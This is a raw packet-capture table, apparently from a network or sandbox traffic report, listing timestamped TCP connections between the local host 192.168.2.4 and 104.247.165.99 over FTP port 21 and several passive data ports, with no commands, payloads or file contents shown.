May 23, 2024 20:28:19.388930082 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:19.393938065 CEST | 21 | 49749 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:19.399079084 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:19.399239063 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:19.465365887 CEST | 21 | 49749 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:19.511895895 CEST | 21 | 49749 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:19.513102055 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.005481958 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.011487007 CEST | 21 | 49750 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:20.011586905 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.011904001 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.073707104 CEST | 21 | 49750 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:20.073780060 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.349301100 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.355204105 CEST | 21 | 49751 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:26.355261087 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.355448008 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.405953884 CEST | 21 | 49751 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:26.405998945 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.714827061 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.721086025 CEST | 21 | 49752 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:30.721184969 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.721434116 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.781487942 CEST | 21 | 49752 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:30.781595945 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:45.846199036 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:45.851243019 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:45.851324081 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:46.731831074 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:46.732157946 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:46.746335983 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.127262115 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.127713919 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:47.132756948 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.617975950 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.619019032 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:47.624151945 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.921236992 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.921576977 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:47.926567078 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.150744915 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.151035070 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.207576036 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.499938965 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.500075102 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.505131006 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.805833101 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.806586981 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.851363897 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.853885889 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.854098082 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.854190111 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.876631021 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.593909979 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.598907948 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.606357098 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.606368065 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.606378078 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.606558084 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.608469963 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608479977 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608489990 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608499050 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608508110 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608642101 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.610196114 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.610388041 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.617858887 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.618066072 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.627258062 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627273083 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627284050 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627300978 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627316952 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627326965 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627351999 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.627405882 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.628094912 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.628107071 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.628314972 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.636593103 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.648252010 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.664282084 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.666683912 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:50.311012983 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:50.366996050 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:50.381091118 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:50.381165028 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.326834917 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.340250015 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:00.568528891 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:00.571264982 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.577728033 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:00.578906059 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.578975916 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.679897070 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.207123995 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.207381964 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.213155985 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.213208914 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222420931 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222435951 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222445011 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222454071 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222461939 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222467899 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222470999 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222479105 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222510099 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222516060 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222552061 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222574949 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.231611967 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.231621981 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.231648922 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.231679916 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.238817930 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238828897 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238836050 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238845110 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238852978 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238853931 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.238862038 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238869905 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238897085 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.238940954 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.245832920 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252717972 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252727032 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252734900 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252743959 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.301573038 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.301629066 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.364968061 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.702121973 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.867197037 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.308434963 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.326623917 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:04.818742037 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:04.819273949 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.829797029 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:04.829866886 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.829952002 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.892028093 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.467633963 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.467901945 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.473220110 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.473380089 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.480151892 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480163097 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480170965 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480180025 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480189085 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480197906 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480206013 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480215073 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480272055 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.489564896 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.489574909 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.489624977 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.494360924 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494370937 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494379997 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494388103 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494395971 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494404078 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494416952 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.494438887 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.494477987 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.499164104 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.503923893 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.503935099 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.550035954 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.550154924 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.554502010 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.965930939 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:06.163846016 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.668451071 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.677800894 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:14.906666040 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:14.910501957 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.915430069 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:14.915560007 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.915680885 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.965992928 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.544559002 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.544807911 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.549992085 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.550045967 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.555022001 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555033922 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555043936 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555054903 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555063963 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555074930 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555084944 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555093050 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555095911 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.555104017 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555141926 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.555166960 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.559859991 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.559909105 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.564688921 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564699888 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564707994 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564717054 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564721107 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564743996 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.564769030 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.569499969 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.569574118 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.574305058 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.574317932 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.574327946 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579479933 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579492092 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579504013 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579513073 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.601366997 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.606285095 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.606301069 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.606357098 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:16.068845987 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:16.210828066 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.453752995 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.469830990 CEST | 21 | 49758 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:41.469898939 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.470134974 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.487736940 CEST | 21 | 49758 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:41.487747908 CEST | 21 | 49758 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:41.487802982 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.043258905 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.054173946 CEST | 21 | 49759 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:56.054464102 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.054635048 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.106340885 CEST | 21 | 49759 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:56.112765074 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.073596954 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.078735113 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.078844070 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.728112936 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.728311062 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.733654976 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.975085020 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.975284100 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.980214119 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.230171919 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.230320930 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.235680103 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.459373951 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.459501028 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.464473009 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.683608055 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.683875084 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.695144892 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.930624008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.930823088 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.935805082 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.158257008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.158885002 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.163907051 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.164060116 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.164067030 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.216165066 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.790853024 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.791191101 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.796251059 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.796484947 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.801398993 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801417112 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801428080 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801439047 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801454067 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801465034 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801475048 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801486015 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801491976 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.801497936 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.801563025 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.806185007 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.806386948 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.810995102 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811016083 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811028957 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
